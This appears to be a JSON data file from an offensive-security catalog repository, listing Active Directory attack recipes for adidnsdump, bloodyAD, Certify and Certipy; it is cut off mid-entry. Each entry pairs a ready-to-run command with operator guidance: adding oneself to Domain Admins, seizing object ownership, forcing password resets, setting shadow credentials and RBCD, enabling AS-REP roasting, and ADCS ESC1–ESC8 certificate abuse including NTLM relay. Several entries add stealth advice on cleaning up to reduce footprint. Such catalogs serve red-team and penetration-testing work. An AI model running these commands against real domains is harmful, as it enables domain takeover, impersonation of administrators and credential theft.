daemon-sec-lotl

DÆMONBins: GTFOBins × LOLBAS × WADComs × LOOBins in one filterable catalog
git clone https://git.daemon-sec.xyz/daemon-sec-lotl.git
Log | Files | Refs | Submodules | README | LICENSE

wadcoms-additions.json (211231B)


      1 [
      2   {
      3     "id": "wadcoms:adidnsdump-Enum",
      4     "toolId": "wadcoms:adidnsdump",
      5     "toolName": "adidnsdump",
      6     "name": "adidnsdump-Enum",
      7     "source": "DAEMON",
      8     "platform": [
      9       "Linux",
     10       "ActiveDirectory",
     11       "Windows"
     12     ],
     13     "capability": [
     14       "Enumeration",
     15       "Discovery"
     16     ],
     17     "nativeCategory": [
     18       "Enumeration",
     19       "Discovery"
     20     ],
     21     "command": "# List available DNS zones\nadidnsdump -u 'test.local\\john' -p password123 --print-zones ldap://10.10.10.1\n# Dump the default zone; -r resolves nodes hidden from the unauthenticated listing (records.csv)\nadidnsdump -u 'test.local\\john' -p password123 -r ldap://10.10.10.1",
     22     "description": "adidnsdump (dirkjanm) abuses the fact that any authenticated domain user can read the AD-integrated DNS zones (stored in the DomainDnsZones/ForestDnsZones partitions), effectively performing a zone transfer without being a DNS admin. Records whose node name is hidden from the anonymous listing are still enumerable and can be resolved by adding -r, which issues a live DNS query for each hidden node. This maps internal hostnames to IPs for target selection; results are written to records.csv. Use --print-zones first to see which zones exist.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1",
     23     "mitre": [
     24       "T1590.002"
     25     ],
     26     "requires": [
     27       "Username",
     28       "Password"
     29     ],
     30     "services": [
     31       "DNS",
     32       "LDAP"
     33     ],
     34     "references": [
     35       "https://github.com/dirkjanm/adidnsdump",
     36       "https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/",
     37       "https://attack.mitre.org/techniques/T1590/002/"
     38     ],
     39     "added": true
     40   },
     41   {
     42     "id": "wadcoms:bloodyAD-AddComputer",
     43     "toolId": "wadcoms:bloodyAD",
     44     "toolName": "bloodyAD",
     45     "name": "bloodyAD-AddComputer",
     46     "source": "DAEMON",
     47     "platform": [
     48       "Linux",
     49       "ActiveDirectory",
     50       "Windows"
     51     ],
     52     "capability": [
     53       "Execution",
     54       "Privilege Escalation"
     55     ],
     56     "nativeCategory": [
     57       "Exploitation",
     58       "PrivEsc"
     59     ],
     60     "command": "# Create a computer account (returns the new SAM account name and password)\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add computer EVILPC 'Password123!'",
     61     "description": "bloodyAD's `add computer` action creates a new machine account in the domain over LDAP. Any authenticated user can create up to ms-DS-MachineAccountQuota (default 10) computer accounts, so this is a reliable way to obtain an attacker-controlled principal for RBCD, shadow-credential, or S4U abuse chains. The created computer account has a known password you control. Check the MachineAccountQuota before use; a value of 0 blocks this.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
     62     "mitre": [],
     63     "requires": [
     64       "Username",
     65       "Password"
     66     ],
     67     "services": [
     68       "LDAP"
     69     ],
     70     "references": [
     71       "https://github.com/CravateRouge/bloodyAD",
     72       "https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota",
     73       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
     74     ],
     75     "added": true
     76   },
     77   {
     78     "id": "wadcoms:bloodyAD-AddGenericAll",
     79     "toolId": "wadcoms:bloodyAD",
     80     "toolName": "bloodyAD",
     81     "name": "bloodyAD-AddGenericAll",
     82     "source": "DAEMON",
     83     "platform": [
     84       "Linux",
     85       "ActiveDirectory",
     86       "Windows"
     87     ],
     88     "capability": [
     89       "Privilege Escalation",
     90       "Persistence",
     91       "Execution"
     92     ],
     93     "nativeCategory": [
     94       "PrivEsc",
     95       "Persistence",
     96       "Exploitation"
     97     ],
     98     "command": "# Grant john GenericAll over the victim object\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john",
     99     "description": "bloodyAD's `add genericAll` action writes a new ACE granting a trustee full control (GenericAll) over a target object's DACL via LDAP. Use it to escalate a lesser right (WriteDacl / WriteOwner) into full control over a user, group, or computer, or to establish a durable ACL backdoor for persistence. Once you hold GenericAll you can reset passwords, set shadow credentials, or configure RBCD on the target.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tGranted principal: john",
    100     "mitre": [],
    101     "requires": [
    102       "Username",
    103       "Password"
    104     ],
    105     "services": [
    106       "LDAP"
    107     ],
    108     "references": [
    109       "https://github.com/CravateRouge/bloodyAD",
    110       "https://www.thehacker.recipes/ad/movement/dacl/grant-rights",
    111       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"
    112     ],
    113     "added": true
    114   },
    115   {
    116     "id": "wadcoms:bloodyAD-AddGroupMember",
    117     "toolId": "wadcoms:bloodyAD",
    118     "toolName": "bloodyAD",
    119     "name": "bloodyAD-AddGroupMember",
    120     "source": "DAEMON",
    121     "platform": [
    122       "Linux",
    123       "ActiveDirectory",
    124       "Windows"
    125     ],
    126     "capability": [
    127       "Privilege Escalation",
    128       "Execution"
    129     ],
    130     "nativeCategory": [
    131       "PrivEsc",
    132       "Exploitation"
    133     ],
    134     "command": "# Add yourself (john) to a group you can write to\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add groupMember 'Domain Admins' john",
    135     "description": "bloodyAD's `add groupMember` action writes the `member` attribute of a group over LDAP, adding an arbitrary principal (typically yourself) to it. Use it when BloodHound shows you hold GenericAll, GenericWrite, WriteOwner, or Self/AddMember over a privileged group such as an admin or Remote Management group. Adding your account to a high-value group is a direct privilege-escalation primitive; remove yourself afterward to reduce footprint.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget group: Domain Admins",
    136     "mitre": [],
    137     "requires": [
    138       "Username",
    139       "Password"
    140     ],
    141     "services": [
    142       "LDAP"
    143     ],
    144     "references": [
    145       "https://github.com/CravateRouge/bloodyAD",
    146       "https://www.thehacker.recipes/ad/movement/dacl/addmember",
    147       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"
    148     ],
    149     "added": true
    150   },
    151   {
    152     "id": "wadcoms:bloodyAD-AddRBCD",
    153     "toolId": "wadcoms:bloodyAD",
    154     "toolName": "bloodyAD",
    155     "name": "bloodyAD-AddRBCD",
    156     "source": "DAEMON",
    157     "platform": [
    158       "Linux",
    159       "ActiveDirectory",
    160       "Windows"
    161     ],
    162     "capability": [
    163       "Privilege Escalation",
    164       "Lateral Movement",
    165       "Execution"
    166     ],
    167     "nativeCategory": [
    168       "PrivEsc",
    169       "Lateral Movement",
    170       "Exploitation"
    171     ],
    172     "command": "# Allow EVILPC$ to act on behalf of others against DC01$\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add rbcd 'DC01$' 'EVILPC$'",
    173     "description": "bloodyAD's `add rbcd` action writes the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of a target computer over LDAP, configuring Resource-Based Constrained Delegation so that a controlled service account may impersonate any user to that machine. Combine with an attacker-controlled computer account (see bloodyAD add computer) and Impacket getST -impersonate to obtain a service ticket as a local admin. Requires GenericWrite / GenericAll / WriteProperty over the target computer object.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget computer: DC01$\n\n\tControlled service: EVILPC$",
    174     "mitre": [],
    175     "requires": [
    176       "Username",
    177       "Password"
    178     ],
    179     "services": [
    180       "LDAP"
    181     ],
    182     "references": [
    183       "https://github.com/CravateRouge/bloodyAD",
    184       "https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd",
    185       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"
    186     ],
    187     "added": true
    188   },
    189   {
    190     "id": "wadcoms:bloodyAD-DontReqPreauth",
    191     "toolId": "wadcoms:bloodyAD",
    192     "toolName": "bloodyAD",
    193     "name": "bloodyAD-DontReqPreauth",
    194     "source": "DAEMON",
    195     "platform": [
    196       "Linux",
    197       "ActiveDirectory",
    198       "Windows"
    199     ],
    200     "capability": [
    201       "Credential Access",
    202       "Execution"
    203     ],
    204     "nativeCategory": [
    205       "Credential Access",
    206       "Exploitation"
    207     ],
    208     "command": "# Enable targeted AS-REP roasting on the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add uac victim -f DONT_REQ_PREAUTH",
    209     "description": "bloodyAD's `add uac` action with the `-f DONT_REQ_PREAUTH` flag sets the DONT_REQ_PREAUTH bit in a target user's userAccountControl over LDAP, disabling Kerberos pre-authentication. This is a targeted AS-REP roasting primitive: once the flag is set you can request an AS-REP for the account and crack it offline. Requires GenericWrite / write access to the target's userAccountControl; remove the flag afterward to clean up.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim",
    210     "mitre": [],
    211     "requires": [
    212       "Username",
    213       "Password"
    214     ],
    215     "services": [
    216       "LDAP",
    217       "Kerberos"
    218     ],
    219     "references": [
    220       "https://github.com/CravateRouge/bloodyAD",
    221       "https://www.thehacker.recipes/ad/movement/kerberos/asreproast",
    222       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"
    223     ],
    224     "added": true
    225   },
    226   {
    227     "id": "wadcoms:bloodyAD-SetOwner",
    228     "toolId": "wadcoms:bloodyAD",
    229     "toolName": "bloodyAD",
    230     "name": "bloodyAD-SetOwner",
    231     "source": "DAEMON",
    232     "platform": [
    233       "Linux",
    234       "ActiveDirectory",
    235       "Windows"
    236     ],
    237     "capability": [
    238       "Privilege Escalation",
    239       "Execution",
    240       "Persistence"
    241     ],
    242     "nativeCategory": [
    243       "PrivEsc",
    244       "Exploitation",
    245       "Persistence"
    246     ],
    247     "command": "# Take ownership of the victim object, then grant yourself full control\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set owner victim john\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john",
    248     "description": "bloodyAD's `set owner` action rewrites the owner field in a target object's security descriptor over LDAP. The object owner has implicit WriteDacl, so seizing ownership of a user, group, or computer lets you subsequently grant yourself GenericAll (see bloodyAD add genericAll) and fully control it. Use it when BloodHound reports WriteOwner over a principal. Pair it with a follow-up DACL write to complete the takeover.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tNew owner: john",
    249     "mitre": [],
    250     "requires": [
    251       "Username",
    252       "Password"
    253     ],
    254     "services": [
    255       "LDAP"
    256     ],
    257     "references": [
    258       "https://github.com/CravateRouge/bloodyAD",
    259       "https://www.thehacker.recipes/ad/movement/dacl/grant-ownership",
    260       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"
    261     ],
    262     "added": true
    263   },
    264   {
    265     "id": "wadcoms:bloodyAD-SetPassword",
    266     "toolId": "wadcoms:bloodyAD",
    267     "toolName": "bloodyAD",
    268     "name": "bloodyAD-SetPassword",
    269     "source": "DAEMON",
    270     "platform": [
    271       "Linux",
    272       "ActiveDirectory",
    273       "Windows"
    274     ],
    275     "capability": [
    276       "Execution",
    277       "Privilege Escalation"
    278     ],
    279     "nativeCategory": [
    280       "Exploitation",
    281       "PrivEsc"
    282     ],
    283     "command": "# Force-reset the password of a user you have write rights over\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set password victim 'NewPassword123!'",
    284     "description": "bloodyAD's `set password` action performs a targeted password reset on a user or computer object over LDAP(S). It is the exploitation step when you hold GenericAll, User-Force-Change-Password, or WriteAll over a victim principal discovered in BloodHound. Resetting a service account or privileged user password grants immediate takeover, at the cost of locking out the legitimate user, so it is loud. Requires LDAPS (or LDAP with channel binding) on modern DCs for the password write.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim",
    285     "mitre": [],
    286     "requires": [
    287       "Username",
    288       "Password"
    289     ],
    290     "services": [
    291       "LDAP"
    292     ],
    293     "references": [
    294       "https://github.com/CravateRouge/bloodyAD",
    295       "https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword",
    296       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"
    297     ],
    298     "added": true
    299   },
    300   {
    301     "id": "wadcoms:bloodyAD-ShadowCredentials",
    302     "toolId": "wadcoms:bloodyAD",
    303     "toolName": "bloodyAD",
    304     "name": "bloodyAD-ShadowCredentials",
    305     "source": "DAEMON",
    306     "platform": [
    307       "Linux",
    308       "ActiveDirectory",
    309       "Windows"
    310     ],
    311     "capability": [
    312       "Privilege Escalation",
    313       "Persistence",
    314       "Credential Access"
    315     ],
    316     "nativeCategory": [
    317       "PrivEsc",
    318       "Persistence",
    319       "Credential Access"
    320     ],
    321     "command": "# Add a shadow credential (KeyCredentialLink) to the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add shadowCredentials 'DC01$'",
    322     "description": "bloodyAD's `add shadowCredentials` action appends an attacker-generated key credential to the target's `msDS-KeyCredentialLink` attribute (the Shadow Credentials / Key Trust technique). Requiring only GenericWrite over the victim and an ADCS-enabled PKINIT-capable environment, it lets you authenticate as the target via a certificate and recover its NT hash without changing the account's password, making it far stealthier than a password reset. bloodyAD prints the PFX and follow-up PKINIT command.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: DC01$",
    323     "mitre": [],
    324     "requires": [
    325       "Username",
    326       "Password"
    327     ],
    328     "services": [
    329       "LDAP",
    330       "ADCS"
    331     ],
    332     "references": [
    333       "https://github.com/CravateRouge/bloodyAD",
    334       "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials",
    335       "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"
    336     ],
    337     "added": true
    338   },
    339   {
    340     "id": "wadcoms:Certify-ESC1",
    341     "toolId": "wadcoms:Certify",
    342     "toolName": "Certify",
    343     "name": "Certify-ESC1",
    344     "source": "DAEMON",
    345     "platform": [
    346       "Windows",
    347       "ActiveDirectory"
    348     ],
    349     "capability": [
    350       "Privilege Escalation",
    351       "Execution"
    352     ],
    353     "nativeCategory": [
    354       "PrivEsc",
    355       "Exploitation"
    356     ],
    357     "command": "Certify.exe request /ca:dc.test.local\\test-CA /template:ESC1 /altname:administrator",
    358     "description": "Certify is the Windows/.NET GhostPack tool for enumerating and abusing AD CS from an existing foothold. Its request verb enrolls in a vulnerable template and, for ESC1, uses /altname to set an arbitrary Subject Alternative Name (e.g. Administrator) on the issued certificate. The output PEM is converted to .pfx with openssl and then passed to Rubeus asktgt /certificate for PKINIT. Use this when you already have a Windows beacon and want to stay on-host rather than pivoting to a Linux attacker box with Certipy.\n\nCommand Reference:\n\n\tCA config: dc.test.local\\test-CA\n\n\tTemplate: ESC1\n\n\tImpersonated user: Administrator",
    359     "mitre": [],
    360     "requires": [
    361       "Shell"
    362     ],
    363     "services": [
    364       "ADCS"
    365     ],
    366     "references": [
    367       "https://github.com/GhostPack/Certify",
    368       "https://posts.specterops.io/certified-pre-owned-d95910965cd2",
    369       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    370     ],
    371     "added": true
    372   },
    373   {
    374     "id": "wadcoms:Certipy-Account-Create",
    375     "toolId": "wadcoms:Certipy",
    376     "toolName": "Certipy",
    377     "name": "Certipy-Account-Create",
    378     "source": "DAEMON",
    379     "platform": [
    380       "Linux",
    381       "ActiveDirectory",
    382       "Windows"
    383     ],
    384     "capability": [
    385       "Execution"
    386     ],
    387     "nativeCategory": [
    388       "Exploitation"
    389     ],
    390     "command": "certipy account create -u john@test.local -p password123 -dc-ip 10.10.10.1 -user 'WEBSRV01$' -pass 'ComputerPass123!' -dns websrv01.test.local",
    391     "description": "Certipy account create adds a new computer (or user) object over LDAP when the operator has MachineAccountQuota available or delegated create rights. This is useful for staging RBCD, Shadow Credentials, or ESC-chain victim accounts that the operator fully controls. The subcommand also supports read/update/delete to modify existing objects' attributes (UPN, SPN, DNS hostname). Runs over LDAP, so add -k / -dc-host for Kerberos-only environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew account: WEBSRV01$\n\n\tDomain Controller IP: 10.10.10.1",
    392     "mitre": [],
    393     "requires": [
    394       "Username",
    395       "Password"
    396     ],
    397     "services": [
    398       "LDAP"
    399     ],
    400     "references": [
    401       "https://github.com/ly4k/Certipy",
    402       "https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723",
    403       "https://www.thehacker.recipes/ad/movement/adcs"
    404     ],
    405     "added": true
    406   },
    407   {
    408     "id": "wadcoms:Certipy-Auth-PKINIT",
    409     "toolId": "wadcoms:Certipy",
    410     "toolName": "Certipy",
    411     "name": "Certipy-Auth-PKINIT",
    412     "source": "DAEMON",
    413     "platform": [
    414       "Linux",
    415       "ActiveDirectory",
    416       "Windows"
    417     ],
    418     "capability": [
    419       "Credential Access"
    420     ],
    421     "nativeCategory": [
    422       "Credential Access"
    423     ],
    424     "command": "certipy auth -pfx administrator.pfx -username administrator -domain test.local -dc-ip 10.10.10.1",
    425     "description": "Certipy auth consumes a certificate/private key pair (.pfx) and performs Kerberos PKINIT pre-authentication to request a TGT for the identity in the certificate. It then uses the U2U/UnPAC-the-hash technique to recover the account's NT hash from the PAC, saving a .ccache and printing the hash. This is the final step of most ADCS escalation chains (ESC1/ESC3/ESC6/shadow creds): turn the issued certificate into a usable TGT and an NT hash for pass-the-hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPFX file: administrator.pfx\n\n\tDomain Controller IP: 10.10.10.1",
    426     "mitre": [],
    427     "requires": [
    428       "PFX"
    429     ],
    430     "services": [
    431       "Kerberos",
    432       "ADCS"
    433     ],
    434     "references": [
    435       "https://github.com/ly4k/Certipy",
    436       "https://posts.specterops.io/certified-pre-owned-d95910965cd2",
    437       "https://www.thehacker.recipes/ad/movement/kerberos/pkinit"
    438     ],
    439     "added": true
    440   },
    441   {
    442     "id": "wadcoms:Certipy-ESC1",
    443     "toolId": "wadcoms:Certipy",
    444     "toolName": "Certipy",
    445     "name": "Certipy-ESC1",
    446     "source": "DAEMON",
    447     "platform": [
    448       "Linux",
    449       "ActiveDirectory",
    450       "Windows"
    451     ],
    452     "capability": [
    453       "Privilege Escalation",
    454       "Execution"
    455     ],
    456     "nativeCategory": [
    457       "PrivEsc",
    458       "Exploitation"
    459     ],
    460     "command": "certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'ESC1' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500",
    461     "description": "ESC1 abuses a certificate template that allows an enrollee to supply an arbitrary Subject Alternative Name (ENROLLEE_SUPPLIES_SUBJECT) and enables Client Authentication EKU, while granting enrollment rights to low-privileged users. Certipy req enrolls against the vulnerable template and sets -upn to Administrator, producing a .pfx that authenticates as the domain admin. Supply -sid with the target's objectSid so the request also survives the 2022 strong certificate mapping (KB5014754) enforcement. Follow up with certipy auth to obtain a TGT and NT hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775",
    462     "mitre": [],
    463     "requires": [
    464       "Username",
    465       "Password"
    466     ],
    467     "services": [
    468       "ADCS"
    469     ],
    470     "references": [
    471       "https://github.com/ly4k/Certipy",
    472       "https://posts.specterops.io/certified-pre-owned-d95910965cd2",
    473       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    474     ],
    475     "added": true
    476   },
    477   {
    478     "id": "wadcoms:Certipy-ESC3",
    479     "toolId": "wadcoms:Certipy",
    480     "toolName": "Certipy",
    481     "name": "Certipy-ESC3",
    482     "source": "DAEMON",
    483     "platform": [
    484       "Linux",
    485       "ActiveDirectory",
    486       "Windows"
    487     ],
    488     "capability": [
    489       "Privilege Escalation",
    490       "Execution"
    491     ],
    492     "nativeCategory": [
    493       "PrivEsc",
    494       "Exploitation"
    495     ],
    496     "command": "# 1) Obtain an enrollment agent certificate\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'EnrollmentAgent'\n\n# 2) Request a cert on behalf of the Administrator using the agent pfx\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -pfx john.pfx -on-behalf-of 'TEST\\Administrator'",
    497     "description": "ESC3 abuses a template that grants the Certificate Request Agent (Enrollment Agent) EKU. Certipy first enrolls in the enrollment-agent template to obtain an agent .pfx, then makes a second request against a normal client-auth template (e.g. User) with -on-behalf-of set to a privileged account and -pfx pointing at the agent certificate. The resulting certificate authenticates as the impersonated user. Requires enrollment rights on both the agent template and the target template.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local",
    498     "mitre": [],
    499     "requires": [
    500       "Username",
    501       "Password"
    502     ],
    503     "services": [
    504       "ADCS"
    505     ],
    506     "references": [
    507       "https://github.com/ly4k/Certipy",
    508       "https://posts.specterops.io/certified-pre-owned-d95910965cd2",
    509       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    510     ],
    511     "added": true
    512   },
    513   {
    514     "id": "wadcoms:Certipy-ESC4",
    515     "toolId": "wadcoms:Certipy",
    516     "toolName": "Certipy",
    517     "name": "Certipy-ESC4",
    518     "source": "DAEMON",
    519     "platform": [
    520       "Linux",
    521       "ActiveDirectory",
    522       "Windows"
    523     ],
    524     "capability": [
    525       "Privilege Escalation",
    526       "Execution"
    527     ],
    528     "nativeCategory": [
    529       "PrivEsc",
    530       "Exploitation"
    531     ],
    532     "command": "# Back up the template config, then overwrite it with a default vulnerable (ESC1-like) configuration\ncertipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -save-old\n\n# Now abuse it exactly like ESC1 (see Certipy-ESC1), then restore the original config afterwards:\n# certipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -configuration ESC4.json",
    533     "description": "ESC4 is a certificate template ACL misconfiguration: the operator has Write/WriteDacl/WriteOwner over a template object. Certipy template with -write-default-configuration overwrites the template's settings with a known ESC1-vulnerable configuration (enrollee-supplied SAN, client-auth EKU, low-priv enrollment), turning any template into an ESC1 path. Use -save-old first to snapshot the original config, exploit ESC1, then restore with -write-configuration <file>.json to reduce footprint. OPSEC: the template change is domain-wide and logged in the config partition.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1",
    534     "mitre": [],
    535     "requires": [
    536       "Username",
    537       "Password"
    538     ],
    539     "services": [
    540       "ADCS",
    541       "LDAP"
    542     ],
    543     "references": [
    544       "https://github.com/ly4k/Certipy",
    545       "https://www.thehacker.recipes/ad/movement/adcs/access-controls",
    546       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    547     ],
    548     "added": true
    549   },
    550   {
    551     "id": "wadcoms:Certipy-ESC6",
    552     "toolId": "wadcoms:Certipy",
    553     "toolName": "Certipy",
    554     "name": "Certipy-ESC6",
    555     "source": "DAEMON",
    556     "platform": [
    557       "Linux",
    558       "ActiveDirectory",
    559       "Windows"
    560     ],
    561     "capability": [
    562       "Privilege Escalation",
    563       "Execution"
    564     ],
    565     "nativeCategory": [
    566       "PrivEsc",
    567       "Exploitation"
    568     ],
    569     "command": "certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500",
    570     "description": "ESC6 occurs when the Enterprise CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, which lets any requester embed an arbitrary SAN into a certificate regardless of the template's subject settings. Certipy req can therefore enroll in a standard client-auth template (e.g. User) while supplying -upn Administrator to impersonate a privileged account. Include -sid to satisfy strong certificate mapping. Note that post-May-2022 patched DCs ignore the SAN unless the mapping is present, so ESC6 alone is often mitigated on updated environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775",
    571     "mitre": [],
    572     "requires": [
    573       "Username",
    574       "Password"
    575     ],
    576     "services": [
    577       "ADCS"
    578     ],
    579     "references": [
    580       "https://github.com/ly4k/Certipy",
    581       "https://posts.specterops.io/certified-pre-owned-d95910965cd2",
    582       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    583     ],
    584     "added": true
    585   },
    586   {
    587     "id": "wadcoms:Certipy-ESC7-ManageCA",
    588     "toolId": "wadcoms:Certipy",
    589     "toolName": "Certipy",
    590     "name": "Certipy-ESC7-ManageCA",
    591     "source": "DAEMON",
    592     "platform": [
    593       "Linux",
    594       "ActiveDirectory",
    595       "Windows"
    596     ],
    597     "capability": [
    598       "Privilege Escalation",
    599       "Execution"
    600     ],
    601     "nativeCategory": [
    602       "PrivEsc",
    603       "Exploitation"
    604     ],
    605     "command": "# Grant our user the officer right on the CA\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -add-officer john\n\n# Enable the SubCA template so we can request against it\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -enable-template 'SubCA'\n\n# Request (goes pending), then issue and retrieve as an officer\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'SubCA' -upn administrator@test.local\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -issue-request 785\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -retrieve 785",
    606     "description": "ESC7 is when a principal holds the ManageCA (or ManageCertificates) right on the Enterprise CA. Certipy ca -add-officer promotes the controlled user to a certificate officer, which lets it approve pending requests. Combined with enabling the built-in SubCA template (-enable-template SubCA), the operator can request a cert that goes pending, then issue it (-issue-request) and retrieve it (-retrieve) as any UPN. This turns CA administrative rights into domain-admin certificate issuance.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local",
    607     "mitre": [],
    608     "requires": [
    609       "Username",
    610       "Password"
    611     ],
    612     "services": [
    613       "ADCS",
    614       "RPC"
    615     ],
    616     "references": [
    617       "https://github.com/ly4k/Certipy",
    618       "https://www.thehacker.recipes/ad/movement/adcs/access-controls",
    619       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    620     ],
    621     "added": true
    622   },
    623   {
    624     "id": "wadcoms:Certipy-ESC8-Relay",
    625     "toolId": "wadcoms:Certipy",
    626     "toolName": "Certipy",
    627     "name": "Certipy-ESC8-Relay",
    628     "source": "DAEMON",
    629     "platform": [
    630       "Linux",
    631       "ActiveDirectory",
    632       "Windows"
    633     ],
    634     "capability": [
    635       "Privilege Escalation",
    636       "Credential Access",
    637       "Execution"
    638     ],
    639     "nativeCategory": [
    640       "PrivEsc",
    641       "Credential Access",
    642       "Exploitation"
    643     ],
    644     "command": "# Start the ADCS HTTP relay targeting the CA web enrollment endpoint\ncertipy relay -target 'http://10.10.10.1' -template 'DomainController'\n\n# In another shell, coerce the DC to authenticate to the listener (10.10.10.2), e.g.\n# coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2",
    645     "description": "ESC8 abuses the AD CS web enrollment interface (certsrv / certfnsh.asp), which accepts NTLM authentication and is not protected by channel binding or EPA by default. Certipy relay stands up an HTTP-to-ADCS relay server; once a privileged machine account (e.g. a domain controller) is coerced into authenticating (PetitPotam/Coercer), the relay requests a certificate from the DomainController template on its behalf. The resulting .pfx authenticates as the coerced machine. Certipy relay is the modern replacement for ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp --adcs.\n\nCommand Reference:\n\n\tCA / web enrollment host IP: 10.10.10.1\n\n\tAttacker/Listener IP: 10.10.10.2",
    646     "mitre": [],
    647     "requires": [
    648       "No_Creds"
    649     ],
    650     "services": [
    651       "ADCS",
    652       "NTLM"
    653     ],
    654     "references": [
    655       "https://github.com/ly4k/Certipy",
    656       "https://posts.specterops.io/certified-pre-owned-d95910965cd2",
    657       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"
    658     ],
    659     "added": true
    660   },
    661   {
    662     "id": "wadcoms:Certipy-ESC9-NoSecurityExtension",
    663     "toolId": "wadcoms:Certipy",
    664     "toolName": "Certipy",
    665     "name": "Certipy-ESC9-NoSecurityExtension",
    666     "source": "DAEMON",
    667     "platform": [
    668       "Linux",
    669       "ActiveDirectory",
    670       "Windows"
    671     ],
    672     "capability": [
    673       "Privilege Escalation",
